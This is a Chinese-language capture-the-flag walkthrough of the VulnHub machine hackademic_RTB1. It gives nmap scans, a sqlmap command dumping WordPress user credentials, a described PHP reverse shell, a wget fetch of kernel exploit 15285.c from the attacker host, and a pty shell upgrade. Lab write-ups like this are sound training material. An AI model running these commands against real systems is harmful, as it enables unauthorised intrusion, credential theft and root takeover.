hackademic_RTB1—靶机详解
hackademic_RTB1—靶机详解

hackademic_RTB1—靶机详解

靶机来自vulnhub

内容:
wordpress已知sql漏洞利用
wordpress编辑php文件建立反弹shell
内核漏洞利用

nmap主机发现
sudo nmap -sn -oN nmap/host 10.10.10.0/24

nmap端口扫描
sudo nmap -p- –min-rate 10000 -oN nmap/port 10.10.10.113

nmap用tcp扫描服务版本探测,常用脚本扫描
sudo nmap -p22,80 -sT -sV -O -sC -oN nmap/TCP 10.10.10.113

nmap用udp扫描端口
nmap -sU -p- –min-rate -oN nmap/UDP 10.10.10.113

nmap用vuln脚本扫描
nmap –script=vuln -oN nmap/vuln 10.10.10.113

既然开放80端口访问看看,点击hackademic.rtb1可以跳转到hackademic_rtb1目录下,看着页面像一个CMS文件系统

whatweb查看该页面信息,发现CMS是wordpress,操作系统是Fedora linux

查看源码发现wordpress版本是 1.5.1.1,版本较老,用searchsploit查看是否存在漏洞

通过搜索可以看到1.5.1.1的wordpress存在sql注入漏洞

获取EXP

cat 查看1059.pl,感觉难以看出细节,而且而且不清楚注入点位置,换一个EXP看看

获取1033EXP

查看1033.pl发现是在index.php下的cat参数具有sql注入漏洞

通过验证也可以看出这里存在报错性的sql注入

直接sqlmap查询注入即可

表名

wp_users列名

这里有user_level是记录用户权限的,user_login是用户名,user_pass是密码,具体可以搜索wordpress database description查看wordpress数据库结构
sudo sqlmap -u "http://10.10.10.113/Hackademic_RTB1/index.php?cat=1" -D wordpress -T wp_users -C user_level,user_login,user_pass --dump
这里可以用sqlmap对hash破解,也可以导出用别的工具破解hash

这里可以看出用户权限最高的用户是GeorgeMiller/q1w2e3

直接登录进入后台

通过后台浏览发现这里有一个可以修改的php页面,可以添加phpinfo();访问看看是否会有phpinfo信息

写入反弹shell后建立nc连接,访问页面,获取shell

提权

uname -a查看系统版本是Linux 2.6.31.5-127.fc12.i686而且通过之前whatweb扫描知道发行版是Fedora

searchsploit 搜索版本内核是否存在已知漏洞

searchsploit linux kernel 2.6.3 |grep "Privilege Escalation"

通过内核版本和系统发行商判断可能是如下几个漏洞

通过尝试15285.c这个EXP有效,查看EXP发现没有详细编译说明,直接上传到靶机上gcc编译执行

建立php临时web服务
php -S 0:80

wget 10.10.10.128/15285.c从kali获取脚本

编译脚本

编译运行后获得root权限,sudo -l缺少tty,用python建立bash获取tty
python -c "import pty;pty.spawn('/bin/bash')"

获取flag

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注